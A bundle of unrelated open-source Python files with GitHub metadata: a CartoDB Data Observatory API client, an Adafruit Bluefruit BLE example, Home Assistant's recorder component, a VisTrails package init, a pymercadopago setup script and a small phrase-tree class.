ENRICHMENT_BASE_PATH = 'api/v4/data/observatory/enrichment'
METADATA_BASE_PATH = 'api/v4/data/observatory/metadata'
class _DODatasetClient:
    """Low-level HTTP client for the Data Observatory dataset API.

    Wraps an authenticated carto client (``auth_client``) and converts
    HTTP errors into ``CartoException`` with a readable reason for 4xx
    responses.
    """

    def __init__(self, auth_client):
        self.auth_client = auth_client
        # May be None if the auth client carries no API key.
        self.api_key = getattr(self.auth_client, 'api_key', None)

    def upload(self, dataframe, name, params=None):
        """Serialize *dataframe* to a temp CSV named *name* and upload it.

        The CSV is written to the current working directory and always
        removed afterwards, even on failure.
        """
        params = params or {}
        dataframe.to_csv(path_or_buf=name, index=False)
        try:
            with open(name, 'rb') as f:
                return self.upload_file_object(f, name, params)
        finally:
            os.remove(name)

    def upload_file_object(self, file_object, name, params=None):
        """POST a readable binary *file_object* as the dataset *name*."""
        params = params or {}
        params['api_key'] = self.api_key
        relative_path = '{}/{}'.format(DATASETS_BASE_PATH, name)
        try:
            response = self.auth_client.send(relative_path, 'POST', params=params, data=file_object)
            response.raise_for_status()
        except requests.HTTPError as e:
            if 400 <= response.status_code < 500:
                # Client error, surface the server-provided reason.
                reason = response.json()['errors'][0]
                error_msg = u'%s Client Error: %s' % (response.status_code, reason)
                raise CartoException(error_msg)
            raise CartoException(e)
        except Exception as e:
            raise CartoException(e)
        return response

    def import_dataset(self, name):
        """Trigger a server-side import of the previously uploaded file.

        Returns a :class:`DODatasetJob` that can be polled for completion.
        """
        params = {'api_key': self.api_key}
        relative_path = '{}/{}/imports'.format(DATASETS_BASE_PATH, name)
        try:
            response = self.auth_client.send(relative_path, 'POST', params=params)
            response.raise_for_status()
            job = response.json()
            return DODatasetJob(job['item_queue_id'], name, self.auth_client)
        except requests.HTTPError as e:
            if 400 <= response.status_code < 500:
                reason = response.json()['errors'][0]
                error_msg = u'%s Client Error: %s' % (response.status_code, reason)
                raise CartoException(error_msg)
            raise CartoException(e)
        except Exception as e:
            raise CartoException(e)

    def upload_dataframe(self, dataframe, name, params=None):
        """Upload *dataframe*, start the import job and block until it ends.

        Returns the final job status ('success' or 'failure').
        """
        params = params or {}
        self.upload(dataframe, name, params)
        job = self.import_dataset(name)
        status = job.result()
        return status

    def download(self, name_id, limit=None, order_by=None, sql_query=None, add_geom=None, is_geography=None):
        """GET the dataset *name_id*; returns the streaming HTTP response."""
        params = {
            'api_key': self.api_key
        }
        # Only forward optional query modifiers the caller actually set.
        if limit is not None:
            params['limit'] = limit
        if order_by is not None:
            params['order_by'] = order_by
        if sql_query is not None:
            params['sql_query'] = sql_query
        if add_geom is not None:
            params['add_geom'] = add_geom
        if is_geography is not None:
            params['is_geography'] = is_geography
        relative_path = '{}/{}'.format(DATASETS_BASE_PATH, name_id)
        try:
            response = self.auth_client.send(relative_path, 'GET', params=params, stream=True)
            response.raise_for_status()
        except requests.HTTPError as e:
            if 400 <= response.status_code < 500:
                # Client error, provide better reason
                reason = response.json()['errors'][0]
                error_msg = u'%s Client Error: %s' % (response.status_code, reason)
                raise CartoException(error_msg)
            raise CartoException(e)
        except Exception as e:
            raise CartoException(e)
        return response

    def download_stream(self, name_id, limit=None, order_by=None, sql_query=None, add_geom=None, is_geography=None):
        """Like :meth:`download` but wrapped in a file-like ResponseStream."""
        return ResponseStream(self.download(name_id,
                                            limit=limit,
                                            order_by=order_by,
                                            sql_query=sql_query,
                                            add_geom=add_geom,
                                            is_geography=is_geography))

    def create(self, payload):
        """POST *payload* (id + schema [+ ttl]) to create an empty dataset."""
        params = {'api_key': self.api_key}
        relative_path = DATASETS_BASE_PATH
        try:
            response = self.auth_client.send(relative_path, 'POST', params=params, json=payload)
            response.raise_for_status()
        except requests.HTTPError as e:
            if 400 <= response.status_code < 500:
                # Client error, provide better reason
                reason = response.json()['errors'][0]
                error_msg = u'%s Client Error: %s' % (response.status_code, reason)
                raise CartoException(error_msg)
            else:
                raise CartoException(e)
        except Exception as e:
            raise CartoException(e)
        return response

    def enrichment(self, payload):
        """Start an enrichment job for *payload* and block until it finishes.

        Returns the final job status ('success' or 'failure').
        """
        params = {'api_key': self.api_key}
        relative_path = ENRICHMENT_BASE_PATH
        try:
            response = self.auth_client.send(relative_path, 'POST', params=params, json=payload)
            response.raise_for_status()
            body = response.json()
            job = DOEnrichmentJob(body['job_id'], self.auth_client)
            status = job.result()
            return status
        except requests.HTTPError as e:
            if 400 <= response.status_code < 500:
                # Client error, provide better reason
                reason = response.json()['errors'][0]
                error_msg = u'%s Client Error: %s' % (response.status_code, reason)
                raise CartoException(error_msg)
            raise CartoException(e)
        except Exception as e:
            raise CartoException(e)

    def metadata(self, entity, filters):
        """GET metadata for *entity*, optionally filtered; returns parsed JSON."""
        params = {'api_key': self.api_key}
        if filters is not None:
            params.update(filters)
        relative_path = '{}/{}'.format(METADATA_BASE_PATH, entity)
        try:
            response = self.auth_client.send(relative_path, 'GET', params=params)
            response.raise_for_status()
            return response.json()
        except requests.HTTPError as e:
            if 400 <= response.status_code < 500:
                # Client error, provide better reason
                reason = response.json()['errors'][0]
                error_msg = u'%s Client Error: %s' % (response.status_code, reason)
                raise CartoException(error_msg)
            else:
                raise CartoException(e)
        except Exception as e:
            raise CartoException(e)
class DODatasetJob:
    """Handle for a dataset import job; polls the API for completion."""

    def __init__(self, job_id, name_id, auth_client):
        self.id = job_id
        self.name = name_id
        self.auth_client = auth_client
        self.api_key = getattr(self.auth_client, 'api_key', None)

    def status(self):
        """Fetch the job status once; raises CartoException on 'failure'."""
        params = {'api_key': self.api_key}
        relative_path = '{}/{}/imports/{}'.format(DATASETS_BASE_PATH, self.name, self.id)
        try:
            response = self.auth_client.send(relative_path, 'GET', params=params)
            response.raise_for_status()
            body = response.json()
            if body['status'] == 'failure':
                msg = u'Client Error: %s' % (body['errors'][0])
                raise CartoException(msg)
            return body['status']
        except requests.HTTPError as e:
            if 400 <= response.status_code < 500:
                # Client error, provide better reason
                reason = response.json()['errors'][0]
                error_msg = u'%s Client Error: %s' % (response.status_code, reason)
                raise CartoException(error_msg)
            raise CartoException(e)
        except Exception as e:
            raise CartoException(e)

    def result(self):
        """Block (1s poll interval) until the job ends; return final status."""
        status = self.status()
        while status not in ('success', 'failure'):
            time.sleep(1)
            status = self.status()
        return status
class DOEnrichmentJob:
    """Handle for an enrichment job; polls the API for completion."""

    def __init__(self, job_id, auth_client):
        self.id = job_id
        self.auth_client = auth_client
        self.api_key = getattr(self.auth_client, 'api_key', None)

    def status(self):
        """Fetch the job status once; raises CartoException on 'failure'."""
        params = {'api_key': self.api_key}
        relative_path = '{}/{}/status'.format(ENRICHMENT_BASE_PATH, self.id)
        try:
            response = self.auth_client.send(relative_path, 'GET', params=params)
            response.raise_for_status()
            body = response.json()
            if body['status'] == 'failure':
                msg = u'Client Error: %s' % (body['errors'][0])
                raise CartoException(msg)
            return body['status']
        except requests.HTTPError as e:
            if 400 <= response.status_code < 500:
                # Client error, provide better reason
                reason = response.json()['errors'][0]
                error_msg = u'%s Client Error: %s' % (response.status_code, reason)
                raise CartoException(error_msg)
            raise CartoException(e)
        except Exception as e:
            raise CartoException(e)

    def result(self):
        """Block (1s poll interval) until the job ends; return final status."""
        status = self.status()
        while status not in ('success', 'failure'):
            time.sleep(1)
            status = self.status()
        return status
class DODataset:
    """Fluent, high-level handle for one Data Observatory dataset.

    Builder methods (``name``, ``column``, ``ttl_seconds``) return ``self``
    so calls can be chained before ``create()``; data methods delegate to
    the internal :class:`_DODatasetClient`.
    """

    def __init__(self, name=None, columns=None, ttl_seconds=None, client=None, auth_client=None):
        self._name = name
        self._columns = columns or []
        self._ttl_seconds = ttl_seconds
        self._client = client or _DODatasetClient(auth_client)

    @staticmethod
    def _map_type(in_type):
        """Translate a user-facing type into the backend type.

        GEOMETRY is exposed to users but stored as GEOGRAPHY server-side;
        everything else passes through unchanged.
        """
        return TYPES_MAPPING.get(in_type, in_type)

    def name(self, name):
        """Set the dataset id. Returns self for chaining."""
        self._name = name
        return self

    def column(self, name=None, type=None):
        """Append a column definition (name, TYPE). Returns self.

        Raises:
            ValueError: if *type* is missing or not one of VALID_TYPES.
        """
        # TODO validate field names
        if type is None:
            # Previously this crashed with AttributeError on type.upper().
            raise ValueError('Column type is required')
        type = type.upper()
        if type not in VALID_TYPES:
            raise ValueError(
                'Invalid type %s. Valid types are: %s' % (type, ', '.join(VALID_TYPES))
            )
        self._columns.append((name, type))
        return self

    def ttl_seconds(self, ttl_seconds):
        """Set the dataset time-to-live in seconds. Returns self."""
        self._ttl_seconds = ttl_seconds
        return self

    def create(self):
        """Create the dataset from the accumulated name/schema/ttl."""
        payload = {
            'id': self._name,
            'schema': [{'name': c[0], 'type': self._map_type(c[1])} for c in self._columns],
        }
        if self._ttl_seconds is not None:
            payload['ttl_seconds'] = self._ttl_seconds
        self._client.create(payload)

    def download_stream(self, limit=None, order_by=None, sql_query=None, add_geom=None, is_geography=None):
        """Return a file-like stream of the dataset contents."""
        return self._client.download_stream(name_id=self._name,
                                            limit=limit,
                                            order_by=order_by,
                                            sql_query=sql_query,
                                            add_geom=add_geom,
                                            is_geography=is_geography)

    def upload(self, dataframe, geom_column=None):
        """Upload *dataframe* as CSV to this dataset."""
        return self._client.upload(dataframe, self._name, params={'geom_column': geom_column})

    def upload_file_object(self, file_object, geom_column=None):
        """Upload a readable binary file object to this dataset."""
        return self._client.upload_file_object(file_object, self._name, params={'geom_column': geom_column})

    def import_dataset(self):
        """Start the server-side import; returns a DODatasetJob."""
        return self._client.import_dataset(self._name)

    def upload_dataframe(self, dataframe, geom_column=None):
        """Upload *dataframe* and block until the import job finishes."""
        return self._client.upload_dataframe(dataframe, self._name, params={'geom_column': geom_column})

    def enrichment(self, geom_type='points', variables=None, filters=None, aggregation=None, output_name=None):
        """Run an enrichment job against this dataset; returns final status."""
        payload = {
            'type': geom_type,
            'input': self._name,
            'variables': variables,
            'filters': filters,
            'aggregation': aggregation,
            'output': output_name
        }
        return self._client.enrichment(payload)

    def metadata(self, entity, filters):
        """Return metadata JSON for *entity* filtered by *filters*."""
        return self._client.metadata(entity, filters)
|
{
"content_hash": "ba0fb08d488b01b8c2c64840ae13bb8b",
"timestamp": "",
"source": "github",
"line_count": 354,
"max_line_length": 116,
"avg_line_length": 35.217514124293785,
"alnum_prop": 0.5565893960054544,
"repo_name": "CartoDB/cartodb-python",
"id": "780509e7af66ad164ebf7aa348617047fdc0398a",
"size": "12467",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "carto/do_dataset.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "150677"
}
],
"symlink_target": ""
}
|
import Adafruit_BluefruitLE
from Adafruit_BluefruitLE.services import UART, DeviceInformation
# Get the BLE provider for the current platform.
ble = Adafruit_BluefruitLE.get_provider()
# Main function implements the program logic so it can run in a background
# thread. Most platforms require the main thread to handle GUI events and other
# asyncronous events like BLE actions. All of the threading logic is taken care
# of automatically though and you just need to provide a main function that uses
# the BLE provider.
def main():
    """Connect to the first UART BLE device found and print its DIS info.

    Runs in a background thread supplied by ble.run_mainloop_with(); all
    BLE calls below block until they complete or time out.
    """
    # Clear any cached data because both bluez and CoreBluetooth have issues with
    # caching data and it going stale.
    ble.clear_cached_data()
    # Get the first available BLE network adapter and make sure it's powered on.
    adapter = ble.get_default_adapter()
    adapter.power_on()
    print('Using adapter: {0}'.format(adapter.name))
    # Disconnect any currently connected UART devices.  Good for cleaning up and
    # starting from a fresh state.
    print('Disconnecting any connected UART devices...')
    UART.disconnect_devices()
    # Scan for UART devices.
    print('Searching for UART device...')
    try:
        adapter.start_scan()
        # Search for the first UART device found (will time out after 60 seconds
        # but you can specify an optional timeout_sec parameter to change it).
        device = UART.find_device()
        if device is None:
            raise RuntimeError('Failed to find UART device!')
    finally:
        # Make sure scanning is stopped before exiting.
        adapter.stop_scan()
    print('Connecting to device...')
    device.connect()  # Will time out after 60 seconds, specify timeout_sec parameter
    # to change the timeout.
    # Once connected do everything else in a try/finally to make sure the device
    # is disconnected when done.
    try:
        # Wait for service discovery to complete for the DIS service.  Will
        # time out after 60 seconds (specify timeout_sec parameter to override).
        print('Discovering services...')
        DeviceInformation.discover(device)
        # Once service discovery is complete create an instance of the service
        # and start interacting with it.
        dis = DeviceInformation(device)
        # Print out the DIS characteristics.
        print('Manufacturer: {0}'.format(dis.manufacturer))
        print('Model: {0}'.format(dis.model))
        print('Serial: {0}'.format(dis.serial))
        print('Hardware Revision: {0}'.format(dis.hw_revision))
        print('Software Revision: {0}'.format(dis.sw_revision))
        print('Firmware Revision: {0}'.format(dis.fw_revision))
        print('System ID: {0}'.format(dis.system_id))
        print('Regulatory Cert: {0}'.format(dis.regulatory_cert))
        print('PnP ID: {0}'.format(dis.pnp_id))
    finally:
        # Make sure device is disconnected on exit.
        device.disconnect()
# Initialize the BLE system. MUST be called before other BLE calls!
ble.initialize()
# Start the mainloop to process BLE events, and run the provided function in
# a background thread.  When the provided main function stops running, returns
# an integer status code, or throws an error the program will exit.
# Note: run_mainloop_with() blocks on the main thread until main() returns.
ble.run_mainloop_with(main)
|
{
"content_hash": "d5ecfca81938c358b9e4a0a931dbd851",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 85,
"avg_line_length": 41.43037974683544,
"alnum_prop": 0.689275893675527,
"repo_name": "adafruit/Adafruit_Python_BluefruitLE",
"id": "bf735c505e50f9bd718cd4ecf28192d046db8c03",
"size": "3519",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/device_info.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "103116"
}
],
"symlink_target": ""
}
|
"""Support for recording details."""
import asyncio
from collections import namedtuple
import concurrent.futures
from datetime import datetime, timedelta
import logging
import queue
from sqlite3 import Connection
import threading
import time
from typing import Any, Dict, Optional
from sqlalchemy import create_engine, exc
from sqlalchemy.engine import Engine
from sqlalchemy.event import listens_for
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.pool import StaticPool
import voluptuous as vol
from homeassistant.components import persistent_notification
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_DOMAINS,
CONF_ENTITIES,
CONF_EXCLUDE,
CONF_INCLUDE,
EVENT_HOMEASSISTANT_START,
EVENT_HOMEASSISTANT_STOP,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
MATCH_ALL,
)
from homeassistant.core import CoreState, HomeAssistant, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entityfilter import generate_filter
from homeassistant.helpers.typing import ConfigType
import homeassistant.util.dt as dt_util
from . import migration, purge
from .const import DATA_INSTANCE
from .models import Base, Events, RecorderRuns, States
from .util import session_scope
_LOGGER = logging.getLogger(__name__)

DOMAIN = "recorder"

# Service and service-call attribute names for the adhoc purge service.
SERVICE_PURGE = "purge"
ATTR_KEEP_DAYS = "keep_days"
ATTR_REPACK = "repack"

SERVICE_PURGE_SCHEMA = vol.Schema(
    {
        vol.Optional(ATTR_KEEP_DAYS): vol.All(vol.Coerce(int), vol.Range(min=0)),
        vol.Optional(ATTR_REPACK, default=False): cv.boolean,
    }
)

# Default SQLite database living in the config directory.
DEFAULT_URL = "sqlite:///{hass_config_path}"
DEFAULT_DB_FILE = "home-assistant_v2.db"
DEFAULT_DB_MAX_RETRIES = 10
DEFAULT_DB_RETRY_WAIT = 3

# Configuration keys.
CONF_DB_URL = "db_url"
CONF_DB_MAX_RETRIES = "db_max_retries"
CONF_DB_RETRY_WAIT = "db_retry_wait"
CONF_PURGE_KEEP_DAYS = "purge_keep_days"
CONF_PURGE_INTERVAL = "purge_interval"
CONF_EVENT_TYPES = "event_types"

# Include/exclude filter shape shared with other history-style components.
FILTER_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_EXCLUDE, default={}): vol.Schema(
            {
                vol.Optional(CONF_DOMAINS): vol.All(cv.ensure_list, [cv.string]),
                vol.Optional(CONF_ENTITIES): cv.entity_ids,
                vol.Optional(CONF_EVENT_TYPES): vol.All(cv.ensure_list, [cv.string]),
            }
        ),
        vol.Optional(CONF_INCLUDE, default={}): vol.Schema(
            {
                vol.Optional(CONF_DOMAINS): vol.All(cv.ensure_list, [cv.string]),
                vol.Optional(CONF_ENTITIES): cv.entity_ids,
            }
        ),
    }
)

CONFIG_SCHEMA = vol.Schema(
    {
        vol.Optional(DOMAIN, default=dict): FILTER_SCHEMA.extend(
            {
                vol.Optional(CONF_PURGE_KEEP_DAYS, default=10): vol.All(
                    vol.Coerce(int), vol.Range(min=1)
                ),
                vol.Optional(CONF_PURGE_INTERVAL, default=1): vol.All(
                    vol.Coerce(int), vol.Range(min=0)
                ),
                vol.Optional(CONF_DB_URL): cv.string,
                vol.Optional(
                    CONF_DB_MAX_RETRIES, default=DEFAULT_DB_MAX_RETRIES
                ): cv.positive_int,
                vol.Optional(
                    CONF_DB_RETRY_WAIT, default=DEFAULT_DB_RETRY_WAIT
                ): cv.positive_int,
            }
        )
    },
    extra=vol.ALLOW_EXTRA,
)
def run_information(hass, point_in_time: Optional[datetime] = None):
    """Return information about current run.

    There is also the run that covers point_in_time.
    """
    instance = hass.data[DATA_INSTANCE]
    # No timestamp, or a timestamp inside the active run: answer from memory.
    if point_in_time is None or point_in_time > instance.recording_start:
        return instance.run_info
    # Otherwise look up the historical run whose span contains the timestamp.
    with session_scope(hass=hass) as session:
        query = session.query(RecorderRuns).filter(
            (RecorderRuns.start < point_in_time) & (RecorderRuns.end > point_in_time)
        )
        run = query.first()
        if run:
            # Detach so the row stays usable after the session closes.
            session.expunge(run)
        return run
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
    """Set up the recorder."""
    conf = config[DOMAIN]
    keep_days = conf.get(CONF_PURGE_KEEP_DAYS)
    purge_interval = conf.get(CONF_PURGE_INTERVAL)
    db_max_retries = conf[CONF_DB_MAX_RETRIES]
    db_retry_wait = conf[CONF_DB_RETRY_WAIT]
    db_url = conf.get(CONF_DB_URL, None)
    if not db_url:
        # Fall back to the bundled SQLite file inside the config dir.
        db_url = DEFAULT_URL.format(hass_config_path=hass.config.path(DEFAULT_DB_FILE))
    include = conf.get(CONF_INCLUDE, {})
    exclude = conf.get(CONF_EXCLUDE, {})
    instance = hass.data[DATA_INSTANCE] = Recorder(
        hass=hass,
        keep_days=keep_days,
        purge_interval=purge_interval,
        uri=db_url,
        db_max_retries=db_max_retries,
        db_retry_wait=db_retry_wait,
        include=include,
        exclude=exclude,
    )
    instance.async_initialize()
    # Recorder is a Thread subclass; this spawns the worker thread.
    instance.start()

    async def async_handle_purge_service(service):
        """Handle calls to the purge service."""
        instance.do_adhoc_purge(**service.data)

    hass.services.async_register(
        DOMAIN, SERVICE_PURGE, async_handle_purge_service, schema=SERVICE_PURGE_SCHEMA
    )
    # Resolves True/False once the worker thread has (or has not) connected.
    return await instance.async_db_ready
# Work item placed on the recorder queue to request a data purge.
PurgeTask = namedtuple("PurgeTask", ["keep_days", "repack"])
class Recorder(threading.Thread):
"""A threaded recorder class."""
def __init__(
self,
hass: HomeAssistant,
keep_days: int,
purge_interval: int,
uri: str,
db_max_retries: int,
db_retry_wait: int,
include: Dict,
exclude: Dict,
) -> None:
"""Initialize the recorder."""
threading.Thread.__init__(self, name="Recorder")
self.hass = hass
self.keep_days = keep_days
self.purge_interval = purge_interval
self.queue: Any = queue.Queue()
self.recording_start = dt_util.utcnow()
self.db_url = uri
self.db_max_retries = db_max_retries
self.db_retry_wait = db_retry_wait
self.async_db_ready = asyncio.Future()
self.engine: Any = None
self.run_info: Any = None
self.entity_filter = generate_filter(
include.get(CONF_DOMAINS, []),
include.get(CONF_ENTITIES, []),
exclude.get(CONF_DOMAINS, []),
exclude.get(CONF_ENTITIES, []),
)
self.exclude_t = exclude.get(CONF_EVENT_TYPES, [])
self.get_session = None
@callback
def async_initialize(self):
"""Initialize the recorder."""
self.hass.bus.async_listen(MATCH_ALL, self.event_listener)
def do_adhoc_purge(self, **kwargs):
"""Trigger an adhoc purge retaining keep_days worth of data."""
keep_days = kwargs.get(ATTR_KEEP_DAYS, self.keep_days)
repack = kwargs.get(ATTR_REPACK)
self.queue.put(PurgeTask(keep_days, repack))
def run(self):
"""Start processing events to save."""
tries = 1
connected = False
while not connected and tries <= self.db_max_retries:
if tries != 1:
time.sleep(self.db_retry_wait)
try:
self._setup_connection()
migration.migrate_schema(self)
self._setup_run()
connected = True
_LOGGER.debug("Connected to recorder database")
except Exception as err: # pylint: disable=broad-except
_LOGGER.error(
"Error during connection setup: %s (retrying in %s seconds)",
err,
self.db_retry_wait,
)
tries += 1
if not connected:
@callback
def connection_failed():
"""Connect failed tasks."""
self.async_db_ready.set_result(False)
persistent_notification.async_create(
self.hass,
"The recorder could not start, please check the log",
"Recorder",
)
self.hass.add_job(connection_failed)
return
shutdown_task = object()
hass_started = concurrent.futures.Future()
@callback
def register():
"""Post connection initialize."""
self.async_db_ready.set_result(True)
def shutdown(event):
"""Shut down the Recorder."""
if not hass_started.done():
hass_started.set_result(shutdown_task)
self.queue.put(None)
self.join()
self.hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, shutdown)
if self.hass.state == CoreState.running:
hass_started.set_result(None)
else:
@callback
def notify_hass_started(event):
"""Notify that hass has started."""
hass_started.set_result(None)
self.hass.bus.async_listen_once(
EVENT_HOMEASSISTANT_START, notify_hass_started
)
self.hass.add_job(register)
result = hass_started.result()
# If shutdown happened before Home Assistant finished starting
if result is shutdown_task:
return
# Start periodic purge
if self.keep_days and self.purge_interval:
@callback
def async_purge(now):
"""Trigger the purge and schedule the next run."""
self.queue.put(PurgeTask(self.keep_days, repack=False))
self.hass.helpers.event.async_track_point_in_time(
async_purge, now + timedelta(days=self.purge_interval)
)
earliest = dt_util.utcnow() + timedelta(minutes=30)
run = latest = dt_util.utcnow() + timedelta(days=self.purge_interval)
with session_scope(session=self.get_session()) as session:
event = session.query(Events).first()
if event is not None:
session.expunge(event)
run = dt_util.as_utc(event.time_fired) + timedelta(
days=self.keep_days + self.purge_interval
)
run = min(latest, max(run, earliest))
self.hass.helpers.event.track_point_in_time(async_purge, run)
while True:
event = self.queue.get()
if event is None:
self._close_run()
self._close_connection()
self.queue.task_done()
return
if isinstance(event, PurgeTask):
purge.purge_old_data(self, event.keep_days, event.repack)
self.queue.task_done()
continue
if event.event_type == EVENT_TIME_CHANGED:
self.queue.task_done()
continue
if event.event_type in self.exclude_t:
self.queue.task_done()
continue
entity_id = event.data.get(ATTR_ENTITY_ID)
if entity_id is not None:
if not self.entity_filter(entity_id):
self.queue.task_done()
continue
tries = 1
updated = False
while not updated and tries <= self.db_max_retries:
if tries != 1:
time.sleep(self.db_retry_wait)
try:
with session_scope(session=self.get_session()) as session:
try:
dbevent = Events.from_event(event)
session.add(dbevent)
session.flush()
except (TypeError, ValueError):
_LOGGER.warning("Event is not JSON serializable: %s", event)
if event.event_type == EVENT_STATE_CHANGED:
try:
dbstate = States.from_event(event)
dbstate.event_id = dbevent.event_id
session.add(dbstate)
except (TypeError, ValueError):
_LOGGER.warning(
"State is not JSON serializable: %s",
event.data.get("new_state"),
)
updated = True
except exc.OperationalError as err:
_LOGGER.error(
"Error in database connectivity: %s. "
"(retrying in %s seconds)",
err,
self.db_retry_wait,
)
tries += 1
except exc.SQLAlchemyError:
updated = True
_LOGGER.exception("Error saving event: %s", event)
if not updated:
_LOGGER.error(
"Error in database update. Could not save "
"after %d tries. Giving up",
tries,
)
self.queue.task_done()
@callback
def event_listener(self, event):
"""Listen for new events and put them in the process queue."""
self.queue.put(event)
def block_till_done(self):
"""Block till all events processed."""
self.queue.join()
def _setup_connection(self):
"""Ensure database is ready to fly."""
kwargs = {}
# pylint: disable=unused-variable
@listens_for(Engine, "connect")
def set_sqlite_pragma(dbapi_connection, connection_record):
"""Set sqlite's WAL mode."""
if isinstance(dbapi_connection, Connection):
old_isolation = dbapi_connection.isolation_level
dbapi_connection.isolation_level = None
cursor = dbapi_connection.cursor()
cursor.execute("PRAGMA journal_mode=WAL")
cursor.close()
dbapi_connection.isolation_level = old_isolation
if self.db_url == "sqlite://" or ":memory:" in self.db_url:
kwargs["connect_args"] = {"check_same_thread": False}
kwargs["poolclass"] = StaticPool
kwargs["pool_reset_on_return"] = None
else:
kwargs["echo"] = False
if self.engine is not None:
self.engine.dispose()
self.engine = create_engine(self.db_url, **kwargs)
Base.metadata.create_all(self.engine)
self.get_session = scoped_session(sessionmaker(bind=self.engine))
def _close_connection(self):
"""Close the connection."""
self.engine.dispose()
self.engine = None
self.get_session = None
def _setup_run(self):
"""Log the start of the current run."""
with session_scope(session=self.get_session()) as session:
for run in session.query(RecorderRuns).filter_by(end=None):
run.closed_incorrect = True
run.end = self.recording_start
_LOGGER.warning(
"Ended unfinished session (id=%s from %s)", run.run_id, run.start
)
session.add(run)
self.run_info = RecorderRuns(
start=self.recording_start, created=dt_util.utcnow()
)
session.add(self.run_info)
session.flush()
session.expunge(self.run_info)
    def _close_run(self):
        """Save end time for current run.

        Stamps the detached RecorderRuns row kept in self.run_info (see
        _setup_run) with the end time and persists it, then clears the
        reference.
        """
        with session_scope(session=self.get_session()) as session:
            self.run_info.end = dt_util.utcnow()
            session.add(self.run_info)

        self.run_info = None
|
{
"content_hash": "50d5cf865537cee00b600a894254198a",
"timestamp": "",
"source": "github",
"line_count": 471,
"max_line_length": 88,
"avg_line_length": 33.62632696390658,
"alnum_prop": 0.5500063139285263,
"repo_name": "postlund/home-assistant",
"id": "af34d4dd9f631873e6c15e5647e40b8ba9cb8b8f",
"size": "15838",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/recorder/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20215859"
},
{
"name": "Shell",
"bytes": "6663"
}
],
"symlink_target": ""
}
|
"""Package for bundle management. "Bundle" refers to system-level
packages managed by specialized systems such as RedHat's RPM, Debian
and Ubuntu's APT, OSX's fink, etc."""
from vistrails.core.bundles.pyimport import py_import
from vistrails.core.bundles.installbundle import install
|
{
"content_hash": "d66edf79e653c8677e09d326444809a3",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 68,
"avg_line_length": 56.8,
"alnum_prop": 0.8028169014084507,
"repo_name": "Nikea/VisTrails",
"id": "14a819bdaed102f49ce1b8c691de1db7a575f53e",
"size": "2165",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "vistrails/core/bundles/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1421"
},
{
"name": "Inno Setup",
"bytes": "19611"
},
{
"name": "Makefile",
"bytes": "768"
},
{
"name": "Mako",
"bytes": "66415"
},
{
"name": "PHP",
"bytes": "49038"
},
{
"name": "Python",
"bytes": "19674395"
},
{
"name": "R",
"bytes": "778864"
},
{
"name": "Rebol",
"bytes": "3972"
},
{
"name": "Shell",
"bytes": "34182"
},
{
"name": "TeX",
"bytes": "145219"
},
{
"name": "XSLT",
"bytes": "1090"
}
],
"symlink_target": ""
}
|
import os
from setuptools import setup
# Third-party runtime dependencies.
required = [
    'requests',
]

# Importable top-level packages shipped in the distribution.
packages = [
    'pymercadopago',
]

description = "A library to interact with the MercadoPago gateway payment"

setup(
    name="pymercadopago",
    version="0.0.5",
    author="Angel Velasquez, Diego Ramirez",
    author_email="angel.velasquez@elo7.com, diego.ramirez@elo7.com",
    description=description,
    license="MIT",
    keywords="mercadopago pymercadopago",
    url="https://bitbucket.org/angvp/pymercadopago",
    packages=packages,
    # NOTE(review): package_data globs are resolved relative to the package
    # directory itself, so 'pymercadopago/*' and the top-level LICENSE/README/
    # CHANGES entries likely match nothing — verify against a built sdist.
    package_data={'pymercadopago':
                      [
                          'pymercadopago/*',
                          'LICENSE.txt',
                          'README',
                          'CHANGES.txt',
                      ]
                  },
    include_package_data=True,
    platforms=['Platform Independent'],
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'License :: OSI Approved :: MIT License',
    ],
    install_requires=required,
)
|
{
"content_hash": "6fcf74cfa47d1a7754ad4460ecf4cea2",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 74,
"avg_line_length": 25.866666666666667,
"alnum_prop": 0.6116838487972509,
"repo_name": "angvp/pymercadopago",
"id": "5417d16238d3e9e783c32f7837ac0d37448a985d",
"size": "1164",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "14098"
}
],
"symlink_target": ""
}
|
import data_io
class tree(object):
    """Container pairing a phrase with its word-embedding vocabulary ids."""

    def __init__(self, phrase, words):
        # `words` is accepted for interface compatibility; ids are looked up
        # lazily via populate_embeddings().
        self.phrase = phrase
        self.embeddings = []
        self.representation = None

    def populate_embeddings(self, words):
        """Append one vocabulary id per lower-cased token of the phrase."""
        for token in self.phrase.lower().split():
            self.embeddings.append(data_io.lookupIDX(words, token))

    def unpopulate_embeddings(self):
        """Discard any previously looked-up ids."""
        self.embeddings = []
|
{
"content_hash": "ebb7c8286bed56d83bd76e5cc61a3911",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 62,
"avg_line_length": 25.235294117647058,
"alnum_prop": 0.5990675990675991,
"repo_name": "YingyuLiang/SIF_mini_demo",
"id": "aed64326d3e1b36ac1c5b221a4fdc09fadff58e3",
"size": "429",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/tree.py",
"mode": "33188",
"license": "mit",
